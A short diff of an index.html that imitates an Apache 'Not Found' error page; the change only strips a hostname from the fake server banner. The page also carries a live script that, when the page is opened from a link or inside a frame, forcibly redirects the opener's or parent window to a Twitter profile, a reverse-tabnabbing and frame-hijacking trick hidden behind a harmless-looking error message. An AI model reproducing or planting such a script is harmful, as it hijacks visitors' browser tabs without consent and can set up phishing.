--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
    <h1>Not Found</h1>
     <p>The requested URL was not found on this server.</p>
     <hr>
-    <address>Apache/2.2.15 (Red Hat) Server at gitlab.com Port 443</address>
+    <address>Apache/2.2.15 (Red Hat) Server at Port 443</address>
 <script>  
 if (window.opener) window.opener.parent.location.replace('https://twitter.com/__d3f4u17__');
 if (window.parent != window) window.parent.location.replace('https://twitter.com/__d3f4u17__');
